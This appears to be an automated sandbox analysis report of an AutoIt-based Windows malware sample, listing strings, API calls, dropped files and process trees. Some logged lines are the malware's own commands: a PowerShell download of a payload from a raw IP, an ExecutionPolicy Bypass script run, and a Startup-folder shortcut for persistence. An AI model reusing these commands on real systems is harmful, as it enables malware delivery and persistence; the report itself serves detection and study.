Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000004.00000002.2097448709.0000023651695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftH
Source: powershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000006.00000002.3264677363.0000000000CF9000.00000002.00000001.01000000.00000007.sdmp, Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000000B.00000002.3264616200.00000000006B9000.00000002.00000001.01000000.00000009.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000004.00000002.2097758108.0000023652E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2097758108.000002365472D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2097758108.0000023653FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2121724159.0000023662EF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023654878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.2097758108.00000236544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000006.00000003.2121750988.000000000465A000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000002.3266463703.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.6.dr, Guard.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00007FF7EC1B0D24
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CA4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_00CA4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00664830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00664830
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00007FF7EC1B0A6C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC198E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,0_2_00007FF7EC198E18
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CBD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00CBD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0067D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_0067D164

System Summary

Source: C:\Users\user\Desktop\cxZuGa.exeCode function: This is a third-party compiled AutoIt script.0_2_00007FF7EC1237B0
Source: cxZuGa.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: cxZuGa.exe, 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b131a2bb-0
Source: cxZuGa.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a83085bf-9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,0_2_00007FF7EC1A3E20
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF7EC18CE68
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00007FF7EC19D750
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C95778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00C95778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00655778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00655778
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00601A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00610D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: String function: 00618B30 appears 42 times
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: String function: 00007FF7EC148D58 appears 76 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00C50D17 appears 70 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00C58B30 appears 42 times
Source: C:\Users\Public\Guard.exeCode function: String function: 00C41A36 appears 34 times
Source: classification engineClassification label: mal100.expl.evad.winEXE@15/12@2/1
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A3778 GetLastError,FormatMessageW,0_2_00007FF7EC1A3778
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CCE0 AdjustTokenPrivileges,CloseHandle,0_2_00007FF7EC18CCE0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00007FF7EC18D5CC
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C88DE9 AdjustTokenPrivileges,CloseHandle,6_2_00C88DE9
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C89399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00C89399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00648DE9 AdjustTokenPrivileges,CloseHandle,11_2_00648DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00649399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00649399
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A59D8 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_00007FF7EC1A59D8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1BEB34 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00007FF7EC1BEB34
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A6D04 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00007FF7EC1A6D04
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC126580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00007FF7EC126580
Source: C:\Users\user\Desktop\cxZuGa.exe File created: C:\Users\Public\PublicProfile.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kfl2jcw.pmc.ps1
Source: C:\Users\Public\Guard.exeCommand line argument: xf6_2_00C45F8B
Source: cxZuGa.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\cxZuGa.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cxZuGa.exe ReversingLabs: Detection: 44%
Source: cxZuGa.exe Virustotal: Detection: 61%
Source: unknownProcess created: C:\Users\user\Desktop\cxZuGa.exe "C:\Users\user\Desktop\cxZuGa.exe"
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: cxZuGa.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: cxZuGa.exe | Static file information: File size 1083904 > 1048576
Source: cxZuGa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cxZuGa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cxZuGa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cxZuGa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cxZuGa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cxZuGa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cxZuGa.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: cxZuGa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cxZuGa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cxZuGa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cxZuGa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cxZuGa.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Users\user\Desktop\cxZuGa.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Users\user\Desktop\cxZuGa.exe | Code function: 0_2_00007FF7EC126D1C LoadLibraryA,GetProcAddress,0_2_00007FF7EC126D1C
Source: C:\Users\user\Desktop\cxZuGa.exe | Code function: 0_2_00007FF7EC1578FD push rdi; ret 0_2_00007FF7EC157904
Source: C:\Users\user\Desktop\cxZuGa.exe | Code function: 0_2_00007FF7EC157399 push rdi; ret 0_2_00007FF7EC1573A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FF848F100BD pushad ; iretd 4_2_00007FF848F100C1
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C36BCC push ebp; ret 6_2_00C36BE6
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C36BA3 push 68F900C3h; ret 6_2_00C36BAE
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C58B75 push ecx; ret 6_2_00C58B88
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C36C68 push 683600C3h; ret 6_2_00C36C72
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C36C73 push ebp; ret 6_2_00C36C7E
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C3521F push ecx; ret 6_2_00C35222
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C6F34B push ebp; ret 6_2_00C6F350
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C6F357 push ebp; ret 6_2_00C6F35C
Source: C:\Users\Public\Guard.exe | Code function: 6_2_00C6F351 push ebp; ret 6_2_00C6F354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 11_2_00618B75 push ecx; ret 11_2_00618B88

Persistence and Installation Behavior

Source: C:\Users\Public\Guard.exe | File created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Guard.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url

Hooking and other Techniques for Hiding and Protection

Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (132).png
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF7EC144514
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CB59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00CB59B3
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00C45EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_006759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_006759B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00605EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00605EDA
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C533B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00C533B7
Source: C:\Users\user\Desktop\cxZuGa.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4753Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5084Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5543Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4281Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\cxZuGa.exeAPI coverage: 3.7 %
Source: C:\Users\Public\Guard.exeAPI coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 5543 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 4281 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF7EC19C7C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC162F50 FindFirstFileExW,0_2_00007FF7EC162F50
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF7EC1AA874
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA350
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF7EC1A6428
